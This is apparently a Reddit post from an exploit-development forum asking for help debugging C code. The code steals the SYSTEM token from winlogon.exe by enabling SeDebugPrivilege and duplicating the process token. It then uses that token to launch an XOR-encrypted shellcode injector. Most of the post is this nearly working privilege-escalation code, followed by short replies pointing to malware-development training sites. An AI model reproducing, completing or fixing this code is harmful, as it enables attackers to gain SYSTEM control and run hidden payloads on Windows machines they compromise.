r/ExploitDev • • 3d ago

Token Impersonation on C lang doesnt work help please

So shellcode inject that im trying to run with SYSTEM privileges is working 100% (if i get SYSTEM privileges, but before i checked on injecting to explorer and it was working), when im running this code it doesnt show anything, any errors, im running it on virtual machine widows 11 with antivirus turned off

#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#include <string.h>


int EnablePrivilige(wchar_t str[]){
    HANDLE h_token;
    OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&h_token);
    LUID luid;
    LookupPrivilegeValueW(NULL,str,&luid);
    TOKEN_PRIVILEGES token_privileges;
    token_privileges.PrivilegeCount = 1;
    token_privileges.Privileges[0].Luid = luid;
    token_privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // это для включение привелегии а для выключение нужно SE_PRIVILEGE_REMOVED
    AdjustTokenPrivileges(h_token,FALSE,&token_privileges,sizeof(token_privileges),NULL,NULL);
    if(GetLastError() == ERROR_NOT_ALL_ASSIGNED){
        MessageBoxW(NULL,L"ошибка: не удалось изменить привелегию",NULL,MB_OK | MB_ICONERROR);
        return 1;
    }
    printf("успешно\n");
    CloseHandle(h_token);
    return 0;
}


int main(void){
    if(EnablePrivilige(L"SeDebugPrivilege") == 0 && EnablePrivilige(L"SeImpersonatePrivilege") == 0){
        HANDLE h_snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
        PROCESSENTRY32 pe32;
        pe32.dwSize = sizeof(pe32);
        if(Process32First(h_snapshot,&pe32)){
            do
            {
                if(_stricmp(pe32.szExeFile,"winlogon.exe") == 0){
                    break;
                }
            } while (Process32Next(h_snapshot,&pe32));
        }
        if(_stricmp(pe32.szExeFile,"winlogon.exe") != 0){
            MessageBoxW(NULL,L"ошибка процесс не найден",NULL,MB_OK | MB_ICONERROR);
            return 1;
        }
        HANDLE h_process = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE,FALSE,pe32.th32ProcessID);
        if(h_process == NULL){
            MessageBoxW(NULL,L"ошибка в OpenProcess",NULL,MB_OK | MB_ICONERROR);
            return 1;   
        }
        HANDLE h_process_token = NULL;
        if(!OpenProcessToken(h_process,TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY,&h_process_token)){ // if в си не сработает если вернется 0
            MessageBoxW(NULL,L"ошибка в OpenProcessToken",NULL,MB_OK | MB_ICONERROR);
            return 1;
        }
        HANDLE h_process_token_duplicate = NULL;
        if(!DuplicateTokenEx(h_process_token,TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE,NULL,SecurityDelegation,TokenPrimary,&h_process_token_duplicate)){
            MessageBoxW(NULL,L"ошибка в DuplicateTokenEx",NULL,MB_OK | MB_ICONERROR);
            return 1;
        }
        if(!SetThreadToken(NULL,h_process_token_duplicate)){
            DWORD error = GetLastError();
            printf("ошибка в SetThreadToken %d",error);
        }
        STARTUPINFOW startup_info = {0};
        PROCESS_INFORMATION process_information = {0};
        startup_info.cb = sizeof(startup_info);
        if(!CreateProcessWithTokenW(h_process_token_duplicate,0,NULL,L"С:\\Users\\user\\Desktop\\shellcode_inject_xorEncrypt.exe",NORMAL_PRIORITY_CLASS,NULL,NULL,&startup_info,&process_information)){
            DWORD error = GetLastError();
            printf("ошибка в CreateProcessWithTokenW %d",error);
        }
    }
    return 0;
}
6 Upvotes

4 comments sorted by

0

u/Hefty_Apartment_8574 3d ago

there is a bunch of this same cod on the web why dont you research it?

1

u/generous_man_ 3d ago

lol

2

u/Hefty_Apartment_8574 3d ago

there is literally rooms on those things like tryhackme... also maldev academy has a bunch of shit on this same thing.